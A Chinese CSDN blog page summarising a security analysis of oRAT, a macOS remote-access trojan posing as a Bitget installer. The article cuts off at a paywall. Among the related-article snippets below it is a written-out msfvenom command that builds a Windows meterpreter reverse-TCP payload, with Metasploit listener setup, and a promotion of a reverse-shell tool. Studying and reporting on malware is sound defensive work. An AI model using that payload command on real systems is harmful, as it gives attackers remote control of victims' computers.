针对macOS平台的远控木马oRAT

最新推荐文章于 2024-09-01 09:00:00 发布
最新推荐文章于 2024-09-01 09:00:00 发布
阅读量589 收藏 2
点赞数
文章标签: macos linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2201/article/details/129494784
版权
安全研究人员近期发现了一个针对macOS用户的Go编写的远控木马oRAT,它伪装成Bitget应用程序进行传播。oRAT通过预安装脚本在/tmp目录下释放Payload,并使用UPX加壳。恶意软件具备多种功能,包括下载文件、信息收集、端口扫描等,与C&C服务器通过TCP和SUDP通信。虽然攻击者对网络通信有深入理解,但在规避检测方面仍有提升空间。
摘要由CSDN通过智能技术生成

最近,安全研究人员发现了一个新的 APT 组织,该组织针对赌博网站开发了包括 macOS 在内各种平台的恶意软件。而 SentinelOne
最近也发现了一个针对 macOS 用户的、使用 Go 编写的远控木马 oRAT。

使用 Go 编写的远控木马实际上在 Mac 平台上并不常见,这表明攻击者越来越重视 Mac 平台,想要加强对该平台的控制。

oRAT 分发传播

oRAT 通过伪装成 Bitget 应用程序集合的磁盘镜像进行传播,磁盘镜像中包含一个名为 Bitget Apps.pkg的程序安装包,其标识符为
com.adobe.pkg.Bitget

image.png-111kB磁盘镜像

之所以该磁盘镜像和程序安装包值得关注,是因为二者都没有有效的开发者签名,并且程序安装包内并没有任何文件只有一个预安装脚本。

image.png-47.3kB安装包

预安装脚本是一个简短的 shell 脚本,将 Payload 写入 /tmp 目录并赋予可执行权限启动。

image.png-188.2kB预安装脚本

目前尚不清楚攻击者使用何种方式诱使受害者下载并执行恶意文件。从样本需要覆盖来自 Gatekeeper
的默认安全警告来看,用户可能是在获取破解软件、盗版软件等网站下载得到样本,或者通过社会工程学方法诱使受害者绕过 Gatekeeper 的默认安全警告。

但是用户实际上并没有得到他们想要的东西,这对攻击者来说是非常冒险的。用户执行程序后并没有按照预期得到想要的东西,用户是容易产生怀疑的。不过这同时也表明,攻击者的攻击可能并非定向的,而是广泛撒网的攻击。

Payload

通过 darwinx64 检查释放在 /tmp文件夹中的 Payload 时,会发现该二进制文件没有任何符号。与此同时,通过 sections
列表可以发现该文

最低0.47元/天 解锁文章
AIGC小王
关注
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控木马,基础性文章,希望对您有所帮助~
Electron 配置macOS平台的安装图标
读心悦
07-17 3606
在Electron中配置macOS平台的安装图标,你需要遵循macOS对应用程序图标的要求,并确保在Electron项目的打包过程中正确引用这些图标。
Mac木马病毒再现(OSX/Crisis)
系统运维
07-27 531
正当我们翘首期待新版Mac OS X美洲狮10.8的发布,并为它而欢欣鼓舞,忙于下载/安装/测试的时候,在网络安全界却传来了又一个不幸的消息,一个新的Mac病毒被监测到。 这个由Intego公司首先监测到并分析和发布一些具体细节的病毒,同以往的有这很大的不同,比如上次的那个"闻名于世"的闪回(FlashBack),这个病毒并不需要用户的干预,其实,它是默默地在用户无从察觉中感染电...
远程访问型木马——灰鸽子软件的使用,零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
09-01 1329
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
针对macOS的新型木马程序 伪装成Discord混乱使用者
weixin_34247155的博客
12-17 208
资安业者Malwarebytes近日揭露了一款针对macOS的新木马程序OSX.LamePyre,它伪装成游戏玩家常用的通讯程序Discord,却会在背景不断地撷取屏幕画面,并将它们传送到远程的C&C服务器。 文章转自:一起胜博发 虽然伪装成Discord,但它并未具备任何Discord功能,而是一个Automator脚本程序,执行时会在选单列上出现通用的Automator图标,并译码与...
远程访问木马Adwind 3.0再次现身,目标是Linux、Windows和macOS
mozhe_的博客
09-26 676
原文地址:https://www.hackeye.net/threatintelligence/16450.aspx 思科Talos团队于本周一(9月24日)发布的一篇博文中指出,他们与ReversingLabs最近发现了一场新的垃圾电子邮件活动,该活动正在分发Adwind 3.0远程访问木马(RAT),而目标是三大桌面操作系统Linux、Windows和Mac OSX。 根据Talos团队的...
Mac: 再现木马
中国在线教育
10-28 1597
Mac: 再现木马<br />它被发现并被称作,trojan.osx.boonana.a,他可以传染现在主流的Mac OS X系统,该病毒目前通过各种社交网络,以一个叫做"Is this you in this video?"的连接形式传播。<br /> <br />这个连接是一个Java程序,它包含传染Windows和Mac系统的代码,以前有有关在Windows版本的传染报道,不过现在他已经包含了Mac的代码。在Mac上,它会下载Java程序,Java会提示如下提示,而如果你认可,该Java程序可以通过这
通过Go语言实现的一款基于gRPC的远控木马。.zip
05-24
通过Go语言实现的一款基于gRPC的远控木马。Go语言(也称为Golang)是由Google开发的一种静态强类型、编译型的编程语言。它旨在成为一门简单、高效、安全和并发的编程语言,特别适用于构建高性能的服务器和分布式系统...
BlueShell:红蓝对抗跨平台远控工具
02-05
蓝壳 BlueShell是一个Go语言...跨平台,支持Linux,Windows,MacOS 交互式Shell反弹,Linux支持Tab补全,VIM,Ctrl + C等交互操作,Windows只支持普通反弹Shell 袜子5代理反弹 文件上传,下载 TLS通信加密 项目地址:
爱思远控平台客户端安装包
05-04
爱思远控作为一款跨平台的客户端软件,意味着它支持Windows、macOSLinux、Android以及iOS等多种操作系统。这意味着无论用户使用的是哪种设备,都能找到对应的客户端进行安装,实现设备间的远程交互。 安装过程...
远程控制---实验九:IPC远程植入木马
weixin_70557959的博客
05-06 4091
目录 一、实验目的及要求 二、实验原理 IPC 空会话 IPC建立的过程 木马 三、实验环境 四、实验步骤及内容 五、实验总结 六、分析与思考 一、实验目的及要求 1、掌握利用 IPC$入侵目标计算机(windows XP 或 windows 2003)的方法; 2、制作并植入远控木马来达到远程控制对方计算机; 二、实验原理 IPC IPC(Inter-Process Communication) 进程间通信,是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道
用c++写一个远程控制木马(转)
2301_78273259的博客
07-06 2190
1)UINT GetSystemDirectory()函数这个函数的参数 lpBuffer会返回系统路径,我们提取前面两位就是就可以得到系统分区,例如“C:”2)DWORD GetModuleFileName()函数这个函数是返回我们程序自身的完整路径。
基于SSTI的木马远控编写
willing-sir的博客
01-01 238
基于SSTI的木马远控编写 起因是要交实习作业,编写渗透测试平台,我觉得没有页面展示的平台算什么平台,于是乎写了个python flask+jinja2的web页面,但是在写后门远控这一块的时候,遇到了很多问题,没有办法把socket和web端结合起来,因为每次访问触发函数就会导致重复启用socket服务,造成端口冲突,指令也无法传递。当然,并不是说这种方式不可以,flask有其专门的webso...
Mac又遇木马 Proton木马入侵视频格式转换HandBrake服务器 攻击者可以获得苹果电脑Root权限...
weixin_34233618的博客
09-01 349
如果您最近在您Mac上下载了流行的开源视频代码转换器应用HandBrake,那您的计算机可能会感染知名的远程访问木马(RAT)。如果您下载的时间是在2017年5月2日至6日,你的Mac电脑有50%的几率感染Proton木马。 HandBrake官方发布安全通告 并暂时关闭受影响的服务器 HandBrake团队周六发布了安全通告,警告Mac用户说,黑客入侵...
msf之制作木马进行远程控制
帅醉了的博客
03-07 3767
msfvenom制作木马 msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.176.129 LPORT=4444 -b"\x00" -f exe > msf.exe msf设置监听 use exploit/multi/handler 设置payload set ...
控制指令高达二十多种:远控木马Dendoroid.B分析报告( 转)
hicarl的专栏
05-11 911
控制指令高达二十多种:远控木马Dendoroid.B分析报告 IT社区推荐资讯 - ITIndex.net Apr 24 近期,360团队截获了一款功能强大的专业间谍软件,它可以通过PC端远程控制中招用户的手机,控制指令高达二十多种,窃取用户手机通讯录,短信,照片及其它重要隐私数据。这个远控木马与去年知名的Android.Dendoroid木马家族手段非常相似,所以我们将其命
新型远控木马tRat已在多起垃圾电子邮件活动中出现
mozhe_的博客
11-19 1189
TA505是Proofpoint网络安全公司所追踪的最多产的黑客组织之一。从2014年开始,该组织发起了数百起Dridex活动,并在2016年和2017年期间发起了大规模的Locky活动,其中许多活动都涉及到在全球范围内传播数亿条恶意信息。最近,该组织一直在分发各种远程访问木马(RAT),以及其他信息窃取、加载和侦察工具,包括一个被Proofpoint称为“tRat”的之前未被报道过的恶意软件。t...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值